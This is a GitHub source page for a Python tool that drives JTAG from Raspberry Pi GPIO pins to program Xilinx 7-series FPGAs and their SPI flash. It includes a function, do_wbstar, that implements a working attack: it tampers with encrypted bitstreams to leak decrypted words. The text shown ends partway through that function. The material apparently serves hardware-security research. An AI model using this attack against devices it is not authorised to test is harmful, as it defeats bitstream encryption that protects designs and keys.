-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathjtag_gpio.py
executable file
·1429 lines (1242 loc) · 55.5 KB
/
jtag_gpio.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/usr/bin/python3
try:
import RPi.GPIO as GPIO
except RuntimeError:
print("Error importing RPi.GPIO! Did you run as root?")
import csv
import argparse
import time
import subprocess
import logging
import sys
import binascii
from Crypto.Cipher import AES
from enum import Enum
from cffi import FFI
try:
from gpioffi.lib import pi_mmio_init
except ImportError as err:
print('Module not found ({}), attempting to rebuild...'.format(err))
subprocess.call(['python3', 'build.py'])
print('Please try the command again.')
exit(1)
from gpioffi.lib import jtag_pins
from gpioffi.lib import jtag_prog
from gpioffi.lib import jtag_prog_rbk
keepalive = []
ffi = FFI()
# maxbuf - maximum length, in bits, of a bitstream that can be handled by this script
maxbuf = 20 * 1024 * 1024
ffistr = ffi.new("char[]", bytes(maxbuf))
keepalive.append(ffistr)
ffiret = ffi.new("char[]", bytes(maxbuf))
keepalive.append(ffiret)
TCK_pin = 4
TMS_pin = 17
TDI_pin = 27 # TDI on FPGA, out for this script
TDO_pin = 22 # TDO on FPGA, in for this script
PRG_pin = 24
class JtagLeg(Enum):
DR = 0
IR = 1
RS = 2 # reset
DL = 3 # long delay
ID = 4 # idle in run-test
IRP = 5 # IR with pause
IRD = 6 # transition to IR directly
DRC = 7 # DR for config: MSB-to-LSB order, and use fast protocols
DRR = 8 # DR for recovery: print out the value returned in non-debug modes
DRS = 9 # DR for SPI: MSB-to-LSB order, use fast protocols, but also readback data
class JtagState(Enum):
TEST_LOGIC_RESET = 0
RUN_TEST_IDLE = 1
SELECT_SCAN = 2
CAPTURE = 3
SHIFT = 4
EXIT1 = 5
PAUSE = 6
EXIT2 = 7
UPDATE = 8
state = JtagState.RUN_TEST_IDLE
cur_leg = []
jtag_legs = []
tdo_vect = ''
tdo_stash = ''
jtag_results = []
do_pause = False
gpio_pointer = 0
compat = False
readout = False
readdata = 0
use_key = False
nky_key = ''
nky_iv = ''
nky_hmac =''
use_fuzzer = False
from math import log
def bytes_needed(n):
if n == 0:
return 1
return int(log(n, 256))+1
def int_to_binstr(n):
return bin(n)[2:].zfill(bytes_needed(n)*8)
def int_to_binstr_bitwidth(n, bitwidth):
return bin(n)[2:].zfill(bitwidth)
def phy_sync(tdi, tms):
global TCK_pin, TMS_pin, TDI_pin, TDO_pin
if compat:
tdo = GPIO.input(TDO_pin) # grab the TDO value before the clock changes
GPIO.output( (TCK_pin, TDI_pin, TMS_pin), (0, tdi, tms) )
GPIO.output( (TCK_pin, TDI_pin, TMS_pin), (1, tdi, tms) )
GPIO.output( (TCK_pin, TDI_pin, TMS_pin), (0, tdi, tms) )
else:
tdo = jtag_pins(tdi, tms, gpio_pointer)
return tdo
def reset_fpga():
global PRG_pin
GPIO.output(PRG_pin, 0)
time.sleep(0.1)
GPIO.output(PRG_pin, 1)
def decode_ir(ir):
if ir == 0b100110:
return 'EXTEST'
elif ir == 0b111100:
return 'EXTEST_PULSE'
elif ir == 0b111101:
return 'EXTEST_TRAIN'
elif ir == 0b000001:
return 'SAMPLE'
elif ir == 0b000010:
return 'USER1'
elif ir == 0b000011:
return 'USER2'
elif ir == 0b100010:
return 'USER3'
elif ir == 0b100011:
return 'USER4'
elif ir == 0b000100:
return 'CFG_OUT'
elif ir == 0b000101:
return 'CFG_IN'
elif ir == 0b001001:
return 'IDCODE'
elif ir == 0b001010:
return 'HIGHZ_IO'
elif ir == 0b001011:
return 'JPROGRAM'
elif ir == 0b001100:
return 'JSTART'
elif ir == 0b001101:
return 'JSHUTDOWN'
elif ir == 0b110111:
return 'XADC_DRP'
elif ir == 0b010000:
return 'ISC_ENABLE'
elif ir == 0b010001:
return 'ISC_PROGRAM'
elif ir == 0b010010:
return 'XSC_PROGRAM_KEY'
elif ir == 0b010111:
return 'XSC_DNA'
elif ir == 0b110010:
return 'FUSE_DNA'
elif ir == 0b010100:
return 'ISC_NOOP'
elif ir == 0b010110:
return 'ISC_DISABLE'
elif ir == 0b111111:
return 'BYPASS'
elif ir == 0b110001:
return 'FUSE_KEY'
elif ir == 0b110011:
return 'FUSE_USER'
elif ir == 0b110100:
return 'FUSE_CNTL'
else:
return '' # unknown just leave blank for now
def debug_spew(cur_leg):
if not((cur_leg[0] == JtagLeg.DRC) or (cur_leg[0] == JtagLeg.DRS)):
logging.debug("start: %s (%s) / %s", str(cur_leg), str(decode_ir(int(cur_leg[1],2))), str(cur_leg[2]) )
else:
logging.debug("start: %s config data of length %s", cur_leg[0], str(len(cur_leg[1])))
# take a trace and attempt to extract IR, DR values
# assume: at the start of each 'trace' we are coming from TEST-LOGIC-RESET
def jtag_step():
global state
global cur_leg
global jtag_legs
global jtag_results
global tdo_vect, tdo_stash
global do_pause
global TCK_pin, TMS_pin, TDI_pin, TDO_pin
global gpio_pointer
global keepalive
global compat
global readout
global readdata
# logging.debug(state)
if state == JtagState.TEST_LOGIC_RESET:
phy_sync(0, 0)
state = JtagState.RUN_TEST_IDLE
elif state == JtagState.RUN_TEST_IDLE:
if len(cur_leg):
# logging.debug(cur_leg[0])
if cur_leg[0] == JtagLeg.DR or cur_leg[0] == JtagLeg.DRC or cur_leg[0] == JtagLeg.DRR or cur_leg[0] == JtagLeg.DRS:
phy_sync(0, 1)
if cur_leg[0] == JtagLeg.DRR or cur_leg[0] == JtagLeg.DRS:
readout = True
else:
readout = False
state = JtagState.SELECT_SCAN
elif cur_leg[0] == JtagLeg.IR or cur_leg[0] == JtagLeg.IRD:
phy_sync(0, 1)
phy_sync(0, 1)
do_pause = False
state = JtagState.SELECT_SCAN
elif cur_leg[0] == JtagLeg.IRP:
phy_sync(0, 1)
phy_sync(0, 1)
do_pause = True
state = JtagState.SELECT_SCAN
elif cur_leg[0] == JtagLeg.RS:
logging.debug("tms reset")
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
phy_sync(0, 1)
cur_leg = jtag_legs.pop(0)
debug_spew(cur_leg)
state = JtagState.TEST_LOGIC_RESET
elif cur_leg[0] == JtagLeg.DL:
time.sleep(0.005) # 5ms delay
cur_leg = jtag_legs.pop(0)
debug_spew(cur_leg)
elif cur_leg[0] == JtagLeg.ID:
phy_sync(0, 0)
cur_leg = jtag_legs.pop(0)
debug_spew(cur_leg)
else:
if len(jtag_legs):
cur_leg = jtag_legs.pop(0)
debug_spew(cur_leg)
else:
phy_sync(0, 0)
state = JtagState.RUN_TEST_IDLE
elif state == JtagState.SELECT_SCAN:
phy_sync(0, 0)
state = JtagState.CAPTURE
elif state == JtagState.CAPTURE:
phy_sync(0, 0)
tdo_vect = '' # prep the tdo_vect to receive data
state = JtagState.SHIFT
elif state == JtagState.SHIFT:
if cur_leg[0] == JtagLeg.DRC or cur_leg[0] == JtagLeg.DRS:
if cur_leg[0] == JtagLeg.DRC: # duplicate code because we want speed (eliminating TDO readback is significant speedup)
if compat:
GPIO.output((TCK_pin, TDI_pin), (0, 1))
for bit in cur_leg[1][:-1]:
if bit == '1':
GPIO.output((TCK_pin, TDI_pin), (1, 1))
GPIO.output((TCK_pin, TDI_pin), (0, 1))
else:
GPIO.output((TCK_pin, TDI_pin), (1, 0))
GPIO.output((TCK_pin, TDI_pin), (0, 0))
else:
bytestr = bytes(cur_leg[1][:-1], 'utf-8')
ffi = FFI()
ffistr = ffi.new("char[]", bytestr)
keepalive.append(ffistr) # need to make sure the lifetime of the string is long enough for the call
jtag_prog(ffistr, gpio_pointer)
GPIO.output(TCK_pin, 0) # restore this to 0, as jtag_prog() leaves TCK high when done
else: # jtagleg is DRS -- duplicate code, as TDO readback slows things down significantly
if compat:
GPIO.output((TCK_pin, TDI_pin), (0, 1))
for bit in cur_leg[1][:-1]:
if bit == '1':
GPIO.output( (TCK_pin, TDI_pin), (1, 1) )
GPIO.output( (TCK_pin, TDI_pin), (0, 1) )
else:
GPIO.output( (TCK_pin, TDI_pin), (1, 0) )
GPIO.output( (TCK_pin, TDI_pin), (0, 0) )
tdo = GPIO.input(TDO_pin)
if tdo == 1 :
tdo_vect = '1' + tdo_vect
else:
tdo_vect = '0' + tdo_vect
else:
bytestr = bytes(cur_leg[1][:-1], 'utf-8')
tdo_temp = '0'*len(cur_leg[1][:-1]) # initialize space for tdo_vect
retstr = bytes(tdo_temp, 'utf-8')
ffi = FFI()
ffistr = ffi.new("char[]", bytestr)
ffiret = ffi.new("char[]", retstr)
keepalive.append(ffistr) # need to make sure the lifetime of the string is long enough for the call
keepalive.append(ffiret)
jtag_prog_rbk(ffistr, gpio_pointer, ffiret)
tdo_vect = ffi.string(ffiret).decode('utf-8')
state = JtagState.SHIFT
if cur_leg[-1:] == '1':
tdi = 1
else:
tdi = 0
cur_leg = ''
tdo = phy_sync(tdi, 1)
if tdo == 1:
tdo_vect = '1' + tdo_vect
else:
tdo_vect = '0' + tdo_vect
state = JtagState.EXIT1
logging.debug('leaving config')
else:
if len(cur_leg[1]) > 1:
if cur_leg[1][-1] == '1':
tdi = 1
else:
tdi = 0
cur_leg[1] = cur_leg[1][:-1]
tdo = phy_sync(tdi, 0)
if tdo == 1:
tdo_vect = '1' + tdo_vect
else:
tdo_vect = '0' + tdo_vect
state = JtagState.SHIFT
else: # this is the last item
if cur_leg[1][0] == '1':
tdi = 1
else:
tdi = 0
cur_leg = ''
tdo = phy_sync(tdi, 1)
if tdo == 1:
tdo_vect = '1' + tdo_vect
else:
tdo_vect = '0' + tdo_vect
state = JtagState.EXIT1
elif state == JtagState.EXIT1:
tdo_stash = tdo_vect
if do_pause:
phy_sync(0, 0)
state = JtagState.PAUSE
do_pause = False
else:
phy_sync(0, 1)
state = JtagState.UPDATE
elif state == JtagState.PAUSE:
logging.debug("pause")
# we could put more pauses in here but we haven't seen this needed yet
phy_sync(0, 1)
state = JtagState.EXIT2
elif state == JtagState.EXIT2:
phy_sync(0, 1)
state = JtagState.UPDATE
elif state == JtagState.UPDATE:
jtag_results.append(int(tdo_vect, 2)) # interpret the vector and save it
logging.debug("result: %s", str(hex(int(tdo_vect, 2))) )
if readout:
#print('readout: 0x{:08x}'.format( int(tdo_vect, 2) ) )
readdata = int(tdo_vect, 2)
readout = False
tdo_vect = ''
# handle case of "shortcut" to DR
if len(jtag_legs):
if (jtag_legs[0][0] == JtagLeg.DR) or (jtag_legs[0][0] == JtagLeg.IRP) or (jtag_legs[0][0] == JtagLeg.IRD):
if jtag_legs[0][0] == JtagLeg.IRP or jtag_legs[0][0] == JtagLeg.IRD:
phy_sync(0, 1) # +1 cycle on top of the DR cycle below
logging.debug("IR bypassing wait state")
if jtag_legs[0][0] == JtagLeg.IRP:
do_pause = True
cur_leg = jtag_legs.pop(0)
debug_spew(cur_leg)
phy_sync(0,1)
state = JtagState.SELECT_SCAN
else:
phy_sync(0, 0)
state = JtagState.RUN_TEST_IDLE
else:
phy_sync(0, 0)
state = JtagState.RUN_TEST_IDLE
else:
print("Illegal state encountered!")
def jtag_next():
global state
global jtag_results
if state == JtagState.TEST_LOGIC_RESET or state == JtagState.RUN_TEST_IDLE:
if len(jtag_legs):
# run until out of idle
while state == JtagState.TEST_LOGIC_RESET or state == JtagState.RUN_TEST_IDLE:
jtag_step()
# run to idle
while state != JtagState.TEST_LOGIC_RESET and state != JtagState.RUN_TEST_IDLE:
jtag_step()
else:
# this should do nothing
jtag_step()
else:
# we're in a leg, run to idle
while state != JtagState.TEST_LOGIC_RESET and state != JtagState.RUN_TEST_IDLE:
jtag_step()
def do_spi_bitstream(ifile, jtagspi='xc7s50', address=0, verify=True, do_reset=False, raw_binary=False, key=None):
from serialflash import Mx66umFlashDevice
global jtag_legs
if address >= 0x1000000:
print("WARNING: 4-byte addressing required, address 0x{:0x}.".format(address))
#exit(1)
virtualspi = SpiPort(1)
benchmark = False
if benchmark:
from progressbar.bar import ProgressBar
# issue the command to get us into writing the USER1 IR
jtag_legs.append([JtagLeg.IR, '000010', 'user1'])
while len(jtag_legs):
jtag_next()
progress = ProgressBar(min_value=0, max_value=1000).start()
for i in range(1000):
progress.update(i)
jedec_cmd = bytes((0x9f,))
id = virtualspi.exchange(jedec_cmd, 3)
progress.finish()
return
# first load the jtagspi bitstream
jtagspi_bitstream = 'jtagspi/bscan_spi_{}.bit'.format(jtagspi)
do_bitstream(jtagspi_bitstream, key=key)
if do_reset:
reset_fpga()
while len(jtag_legs): # flush the commands from do_bitstream()
jtag_next()
with open(ifile, "rb") as f:
binfile = f.read()
if len(binfile) + address >= 0x1380000:
print('Warning: Image exceeds the current upper bound for kernel data')
# exit(1)
if len(binfile) + address >= 0x1000000:
print('Warning: kernel is getting bloated. Space remaining: {} bytes'.format(0x1380000 - (len(binfile) + address)))
position = 0
if raw_binary == False:
while position < len(binfile):
sync = int.from_bytes(binfile[position:position + 4], 'big')
if sync == 0xaa995566:
break
position = position + 1
program_data = binfile[position:]
# issue the command to get us into writing the USER1 IR
jtag_legs.append([JtagLeg.IR, '000010', 'user1'])
while len(jtag_legs):
jtag_next()
virtualspi = SpiPort(1)
jedec_cmd = bytes((0x9f,))
id = virtualspi.exchange(jedec_cmd, 3)
virtualflash = Mx66umFlashDevice(virtualspi, id)
#print("before erase:")
#readback = virtualflash.read(0, 256)
#print(readback.hex())
#print("erasing")
erase_size = virtualflash.get_erase_size()
print("Using erase block size of {} bytes".format(erase_size))
erase_size_in_sectors = len(program_data) // erase_size
if len(program_data) % erase_size != 0:
erase_size_in_sectors += 1
print("Using erase block size of {} bytes, erasing {} blocks from 0x{:08x} to 0x{:08x} (rounded up from 0x{:08x})".format(erase_size, erase_size_in_sectors, address, address + erase_size_in_sectors * erase_size, address + len(program_data)))
virtualflash.erase(address, erase_size_in_sectors * erase_size)
#print("after erase:")
#readback = virtualflash.read(0, 256)
#print(readback.hex())
#input("hit enter to continue")
virtualflash.write(address, program_data)
from progressbar.bar import ProgressBar
if verify == True:
print("Reading back data for verification...")
read_data = virtualflash.read(address, len(program_data))
print("Comparing data...")
if read_data == program_data:
failures = 0
else:
failures = 1
detailed_compare = False
if detailed_compare:
progress = ProgressBar(min_value=0, max_value=len(program_data), prefix='Verifying ').start()
failures = 0
for i in range(len(program_data)):
if (i % (len(program_data) // 100)) == 0:
progress.update(i)
if i < len(read_data):
if read_data[i] != program_data[i]:
print("Verify fail at 0x{:08x}, want 0x{:02x}, got 0x{:02x}".format(i, program_data[i], read_data[i]))
failures += 1
else:
print("Verify failure: readback data is shorter than programmed data")
failures += 1
break
if failures > 64:
print("Too many failures, terminating verification.")
break
progress.finish()
if failures == 0:
print("Programming verification succeeded")
print("Programming concluded")
def read_spi_bitstream(ofile, jtagspi='xc7s50', address=0, read_len=0x280000, do_reset=False, key=None):
from serialflash import Mx66umFlashDevice
global jtag_legs
if address >= 0x1000000:
print("Warning: 4-byte addressing required (0x{:x}).".format(address))
virtualspi = SpiPort(1)
# first load the jtagspi bitstream
jtagspi_bitstream = 'jtagspi/bscan_spi_{}.bit'.format(jtagspi)
do_bitstream(jtagspi_bitstream, key=key)
if do_reset:
reset_fpga()
while len(jtag_legs): # flush the commands from do_bitstream()
jtag_next()
# issue the command to get us into writing the USER1 IR
jtag_legs.append([JtagLeg.IR, '000010', 'user1'])
while len(jtag_legs):
jtag_next()
virtualspi = SpiPort(1)
jedec_cmd = bytes((0x9f,))
id = virtualspi.exchange(jedec_cmd, 3)
virtualflash = Mx66umFlashDevice(virtualspi, id)
with open(ofile, "wb") as f:
print("Reading back data...")
read_data = virtualflash.read(address, read_len)
f.write(read_data)
print("Read concluded")
def erase(jtagspi='xc7s50', address=0, erase_len=0x280000, do_reset=False, key=None):
from serialflash import Mx66umFlashDevice
global jtag_legs
if address >= 0x1000000:
print("Warning: 4-byte addressing required, address 0x{:0x}.".format(address))
virtualspi = SpiPort(1)
# first load the jtagspi bitstream
jtagspi_bitstream = 'jtagspi/bscan_spi_{}.bit'.format(jtagspi)
do_bitstream(jtagspi_bitstream, key=key)
if do_reset:
reset_fpga()
while len(jtag_legs): # flush the commands from do_bitstream()
jtag_next()
# issue the command to get us into writing the USER1 IR
jtag_legs.append([JtagLeg.IR, '000010', 'user1'])
while len(jtag_legs):
jtag_next()
virtualspi = SpiPort(1)
jedec_cmd = bytes((0x9f,))
id = virtualspi.exchange(jedec_cmd, 3)
virtualflash = Mx66umFlashDevice(virtualspi, id)
erase_size = virtualflash.get_erase_size()
print("Using erase block size of {} bytes".format(erase_size))
erase_size_in_sectors = erase_len // erase_size
if erase_len % erase_size != 0:
erase_size_in_sectors += 1
print("Using erase block size of {} bytes, erasing {} blocks from 0x{:08x} to 0x{:08x} (rounded up from 0x{:08x})".format(erase_size, erase_size_in_sectors, address, address + erase_size_in_sectors * erase_size, address + erase_len))
virtualflash.erase(address, erase_size_in_sectors * erase_size)
print("Erase concluded")
def do_bitstream(ifile, key=None):
global jtag_legs
if key is not None:
sp = subprocess.run(["./encrypt-bitstream.py", "-i", "0", "-f", "jtagspi/bscan_spi_xc7s50.bin", "--key", key, "-o", "bscan_spi_local.bin", "-d"])
ifile = "bscan_spi_local.bin"
logging.debug("Using helper bitstream: {}".format(ifile))
with open(ifile, "rb") as f:
binfile = f.read()
position = 0
while position < len(binfile):
sync = int.from_bytes(binfile[position:position + 4], 'big')
if sync == 0xaa995566:
break
position = position + 1
config_data = int_to_binstr(int.from_bytes(binfile[position:], byteorder='big'))
logging.debug("Config data is {} bytes long".format(len(config_data)))
jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IR, '001001', 'idcode'])
jtag_legs.append([JtagLeg.DR, '00000000000000000000000000000000', ' '])
jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IR, '001011', 'jprogram'])
jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
jtag_legs.append([JtagLeg.DL, '0', 'initdelay'])
jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IRD, '000101', 'cfg_in'])
jtag_legs.append([JtagLeg.DRC, config_data, 'config_data'])
jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IR, '001001', 'idcode'])
jtag_legs.append([JtagLeg.DR, '00000000000000000000000000000000', ' '])
logging.debug("Config data uploaded")
"""
Reverse the order of bits in a word that is bitwidth bits wide
"""
def bitflip(data_block, bitwidth=32):
if bitwidth == 0:
return data_block
bytewidth = bitwidth // 8
bitswapped = bytearray()
i = 0
while i < len(data_block):
data = int.from_bytes(data_block[i:i+bytewidth], byteorder='big', signed=False)
b = '{:0{width}b}'.format(data, width=bitwidth)
bitswapped.extend(int(b[::-1], 2).to_bytes(bytewidth, byteorder='big'))
i = i + bytewidth
return bytes(bitswapped)
def do_wbstar(ifile, offset):
global readdata
global use_key, nky_key, nky_iv, nky_hmac, use_fuzzer
if offset < 1:
print("Offset {} is too small. Must be greater than 0.".format(offset))
exit(0)
with open(ifile, "rb") as f:
binfile = bytearray(f.read())
# search for structure
# 0x3001_6004 -> specifies the CBC key
# 4 words of CBC IV
# 0x3003_4001 -> ciphertext len
# 1 word of ciphertext len
# then ciphertext
position = 0
iv_pos = 0
sync_pos = 0
while position < len(binfile):
cwd = int.from_bytes(binfile[position:position+4], 'big')
if cwd == 0x30016004:
iv_pos = position+4
if cwd == 0x30034001:
break
if cwd == 0xaa995566:
sync_pos = position
position = position + 1
position = position + 4
ciphertext_len = 4* int.from_bytes(binfile[position:position+4], 'big')
logging.debug("original ciphertext len: %d", ciphertext_len)
# patch a new length in, which is 0x98
binfile[position+0] = 0x0
binfile[position+1] = 0x0
binfile[position+2] = 0x0
binfile[position+3] = 0x98
cipherstart = position + 4
# we don't use this, but it's neat to see.
iv_bytes = bitflip(binfile[iv_pos : iv_pos+0x10]) # note that the IV is embedded in the file
logging.debug("recovered iv: %s", binascii.hexlify(iv_bytes))
recovered = [0,0,0,0]
block = [0,0,0,0]
if use_fuzzer:
fuzz_min = 0
fuzz_max = 0x98
else:
fuzz_min = 126 # determined through fuzzing
fuzz_max = 127
for ro_fuzz in range(fuzz_min, fuzz_max):
for word_index in range(0, 4):
# copy attack area as template
attack_area = binfile[sync_pos:cipherstart + 0x98*4] # from HMAC header to end of "configuration footer"
attack_cipherstart = cipherstart - sync_pos # subtract out the sync_pos offset
# mutate the WBSTAR write length
# 0xD selects the third word in the AES block; 0x1 is there originally, so much XOR that out
wbstar_patch = 0xd - word_index
attack_area[attack_cipherstart + 0x3b] = attack_area[attack_cipherstart + 0x3b] ^ wbstar_patch ^ 0x1
# copy in the IV + target block
dest = attack_cipherstart + 6*16 # 6x 16-byte AES blocks
for source in range( sync_pos + attack_cipherstart + (offset-1)*16,
sync_pos + attack_cipherstart + (offset+1)*16 ):
attack_area[dest] = binfile[source]
dest = dest + 1
# patch in 0x2000_0000 (NOP) command over words as they are decrypted to prevent errant commands to fabric
for patch in range(0, word_index):
attack_area[attack_cipherstart + 0x6c - 4*patch] ^= (((recovered[3-patch] >> 24) & 0xff) ^ 0x20)
attack_area[attack_cipherstart + 0x6d - 4*patch] ^= (((recovered[3-patch] >> 16) & 0xff) ^ 0x00)
attack_area[attack_cipherstart + 0x6e - 4*patch] ^= (((recovered[3-patch] >> 8) & 0xff) ^ 0x00)
attack_area[attack_cipherstart + 0x6f - 4*patch] ^= (((recovered[3-patch] >> 0) & 0xff) ^ 0x00)
# attack_area now contains the data to configure
debug = False
if debug:
i = 0
for b in attack_area:
if i % 32 == 0:
print(" ")
i = i + 1
print("{:02x} ".format(b), end='')
print(" ")
with open("check{}.bin".format(word_index), "wb") as check:
check.write(attack_area)
# run the attack
attack_bits = int_to_binstr(int.from_bytes(attack_area, byteorder='big'))
jtag_legs.append([JtagLeg.IR, '001001', 'idcode'])
jtag_legs.append([JtagLeg.DR, '00000000000000000000000000000000', ' '])
jtag_legs.append([JtagLeg.IR, '001011', 'jprogram'])
jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IRD, '000101', 'cfg_in'])
jtag_legs.append([JtagLeg.DRC, attack_bits, 'attack_data'])
#jtag_legs.append([JtagLeg.RS, '0', 'reset'])
#jtag_legs.append([JtagLeg.IR, '001001', 'idcode'])
#jtag_legs.append([JtagLeg.DR, '00000000000000000000000000000000', ' '])
while len(jtag_legs):
jtag_next()
if use_key:
key_bytes = int(nky_key, 16).to_bytes(32, byteorder='big')
logging.debug("key: %s", binascii.hexlify(key_bytes))
with open(ifile, "rb") as ro:
ro_bytes = bytearray(ro.read())
ro_pos = 0
ro_sync_pos = 0
while ro_pos < len(ro_bytes):
cwd = int.from_bytes(ro_bytes[ro_pos:ro_pos+4], 'big')
if cwd == 0xaa995566:
ro_sync_pos = ro_pos
if cwd == 0x30034001:
break
if cwd == 0x30016004:
ro_iv_pos = ro_pos+4
ro_pos = ro_pos + 1
ro_desired_len = 0x98 # 0x10
ro_pos = ro_pos + 4
ro_bytes[ro_pos+0] = 0x0
ro_bytes[ro_pos+1] = 0x0
ro_bytes[ro_pos+2] = 0x0
ro_bytes[ro_pos+3] = ro_desired_len
ro_cipherstart = ro_pos+4
ro_iv_bytes = bitflip(ro_bytes[ro_iv_pos : ro_iv_pos+0x10])
logging.debug("recovered ro iv: %s", binascii.hexlify(ro_bytes[ro_iv_pos : ro_iv_pos+0x10]))
logging.debug("recovered ro iv (flipped): %s", binascii.hexlify(ro_iv_bytes))
ro_area = ro_bytes[ro_sync_pos:ro_cipherstart + ro_desired_len*4]
cipher = AES.new(key_bytes, AES.MODE_CBC, ro_iv_bytes)
if False: # these are static readout bitstreams, not used but kept around for future reference
# code is 512 bits long
if True:
readout_code = 0xaa995566200000002802000120000000200000002000000020000000200000002000000020000000200000002000000020000000200000002000000020000000
readout_len = 64
else:
readout_code = 0x2000000020000000ffffffffffffffffffffffffffffffffffffffffffffffff000000bb11220044ffffffffffffffffaa9955662000000030008001000000042000000020000000200000002802000120000000200000002000000020000000
readout_len = 96
readout_pad = ro_desired_len - readout_len//4
plaintext = bytearray()
plaintext += bytearray(readout_code.to_bytes(readout_len, byteorder='big'))
for i in range(0, readout_pad):
plaintext += int(0x20000000).to_bytes(4, byteorder='big')
else: # dynamically generate the readout bitstream to fuzz the timing
read_wbstar = 0x28020001 # wbstar 0x28020001 / idcode 0x28018001
nop = 0x20000000
sync = 0xaa995566
plaintext = bytearray()
for i in range(0, ro_desired_len):
if i == 0:
plaintext += int(sync).to_bytes(4, byteorder='big')
elif i == ro_desired_len - ro_fuzz:
plaintext += int(read_wbstar).to_bytes(4, byteorder='big')
else:
plaintext += int(nop).to_bytes(4, byteorder='big')
readout_crypt = bitflip(cipher.encrypt(bitflip(plaintext)))
i = ro_cipherstart - ro_sync_pos
for b in readout_crypt:
ro_area[i] = b
i = i + 1
readout_cmd = int_to_binstr(int.from_bytes(ro_area, byteorder='big'))
i = 0
if debug:
for b in ro_area:
if i % 32 == 0:
print(" ")
i = i + 1
print("{:02x} ".format(b), end='')
print(" ")
with open("check-ro.bin".format(word_index), "wb") as check:
check.write(ro_area)
jtag_legs.append([JtagLeg.IR, '001001', 'idcode'])
jtag_legs.append([JtagLeg.DR, '00000000000000000000000000000000', ' '])
#jtag_legs.append([JtagLeg.IR, '001011', 'jprogram'])
#jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
#jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
